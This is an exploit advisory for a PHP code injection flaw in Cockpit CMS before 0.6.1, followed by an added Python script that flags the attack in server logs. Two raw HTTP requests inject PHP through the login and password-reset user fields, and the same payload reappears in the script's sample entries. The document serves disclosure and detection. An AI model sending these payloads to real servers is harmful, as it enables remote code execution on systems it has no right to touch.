Cockpit CMS 0.6.1 – Remote Code Execution

  • Author: Rafael Resende
    Date: 2021-01-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49390/
  • # Cockpit CMS 0.6.1 - Remote Code Execution
    # Product: Cockpit CMS (https://getcockpit.com)
    # Version: Cockpit CMS < 0.6.1
    # Vulnerability Type: PHP Code Execution
    # Exploit Author: Rafael Resende
    # Attack Type: Remote
    # Vulnerability Description
    # Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.
    
    # Exploit Login
    POST /auth/check HTTP/1.1
    Host: example.com
    User-Agent: Mozilla/5.0
    Content-Type: application/json; charset=UTF-8
    Content-Length: 52
    Origin: https://example.com
    
    {"auth":{"user":"test'.phpinfo().'","password":"b"}}
    
    # Exploit Password reset
    POST /auth/requestreset HTTP/1.1
    Host: example.com
    User-Agent: Mozilla/5.0
    Content-Type: application/json; charset=UTF-8
    Content-Length: 28
    Origin: https://example.com
    
    {"user":"test'.phpinfo().'"}
    
    ## Impact
    Allows attackers to execute malicious code and gain access to the server.
    
    ## Fix
    Update to versions >= 0.6.1
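
A log-triage check for the two requests shown above, added here as an example and not part of the original advisory or of Cockpit's code: it flags POSTs to /auth/check and /auth/requestreset whose user field is not a plain name. The function names, the character set treated as suspicious and the sample log entries are assumptions constructed for illustration.

```python
import json

# Endpoints and field locations taken from the two requests on this page.
USER_FIELD = {
    "/auth/check": ("auth", "user"),
    "/auth/requestreset": ("user",),
}
# Assumption: legitimate user names / e-mail addresses never contain these.
SUSPICIOUS = set("'\"();\\`$")
_MISSING = object()


def extract_user(path, body):
    """Return the submitted user value, or _MISSING if not applicable."""
    keys = USER_FIELD.get(path.split("?", 1)[0].rstrip("/"))
    if keys is None:
        return _MISSING
    try:
        node = json.loads(body)
    except ValueError:
        return _MISSING
    for key in keys:
        if not isinstance(node, dict) or key not in node:
            return _MISSING
        node = node[key]
    return node


def classify(method, path, body):
    """Return 'ignore', 'ok' or 'suspicious' for one logged request."""
    if method.upper() != "POST":
        return "ignore"
    user = extract_user(path, body)
    if user is _MISSING:
        return "ignore"
    # A non-string value is also unexpected for a login name.
    if not isinstance(user, str) or SUSPICIOUS & set(user):
        return "suspicious"
    return "ok"


# Constructed sample log entries: (method, path, JSON body).
SAMPLES = [
    ("POST", "/auth/check", '{"auth":{"user":"admin","password":"b"}}'),
    ("POST", "/auth/check", '{"auth":{"user":"test\'.phpinfo().\'","password":"b"}}'),
    ("POST", "/auth/requestreset", '{"user":"test\'.phpinfo().\'"}'),
    ("POST", "/auth/requestreset", '{"user":"editor@example.com"}'),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(classify(method, path, body), method, path, body)
```

A hit only marks a request for review; whether the host was running a version before 0.6.1 at the time decides if it mattered.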